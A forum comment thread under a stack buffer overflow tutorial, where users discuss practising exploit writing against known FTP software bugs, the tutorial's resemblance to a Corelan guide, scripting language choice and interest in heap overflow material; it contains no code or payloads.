said:

said:

said:

said:

Just finished writing an exploit for some FTP software, not a private one but it still feels good when that shell spawns :) your tutorial was a good reference for it

Did you find the vuln or was it already known?

known unfortunately , i was just practicing some exploitation rather than finding some.

Ahh I see. Mind sharing the vuln I wanna try ;)

Btw.... Not pointing fingers but this looks awfully similar to
http://www.corelan.be:8800/index.php/20 ... overflows/

Every Stack based simple buffer overflow will look awfully similar :) .
Also few key differences

--->Different Scripting language used
--->Different Debugger used

and as far as concept is concerned it will always be the same in this kind of exploit :)

said:

said:

said:

said:

said:

Did you find the vuln or was it already known?

known unfortunately , i was just practicing some exploitation rather than finding some.

Ahh I see. Mind sharing the vuln I wanna try ;)

Btw.... Not pointing fingers but this looks awfully similar to
http://www.corelan.be:8800/index.php/20 ... overflows/

Every Stack based simple buffer overflow will look awfully similar :) .
Also few key differences

--->Different Scripting language used
--->Different Debugger used

and as far as concept is concerned it will always be the same in this kind of exploit :)

True. Although it's not that hard to change perl to python. And just to add, the guide wasn't explained as well as the guide on the site. I'd add more of an explanation to this.

lol ... you are right ... Its not hard to change perl to python or ruby or something else . What is important is learning the concept and just to make sure i learned it i did it differently .. different debugger and scripting language and yeah oh well writing guide i did it my way and you have every right to love it or hate it or say i skeptical it is not you it was written by somebody else and all :) .Also see tutorial of any concept ..for eg SQLi they all look the same coz the core concept behind a exploitation technique is always the same.. it doesnt change with tutorials :). .....

said:

Well I got round to looking deeper into shellcoding tonight. I read through this tutorial and the one on the site (went through the entire tut) and I've gotta say I'm definitely going to buy a book on shellcoding. I still see no need to change from perl to python :P however that's probably due to the amount of coding in perl i've done recently which I love.

You did the tutorial well as learning this kinda thing without pictures would be a challenge to say the least (in my opinion). I can actually say I've learned a lot tonight so thanks

Thanks dude .. :)

I think chronic meant its simillar in that isnt it the same vulnerable app

LOL You should also check this chroniccommand http://in.linkedin.com/in/d4rk357

Nice tutorial. Good work.

Really good tutorial, was looking for something like that.
Thank you.

said:

i think buffer overflow tuts have now been done to death. i'd like to see more talk about heap overflows (something which doesn't get mentioned enough)

I wouldn't attempt to write a BoF or HoF tutorial just based on the fact that there are awesome tutorials around, Peter's one over at corelan is the best series i've seen for completeness.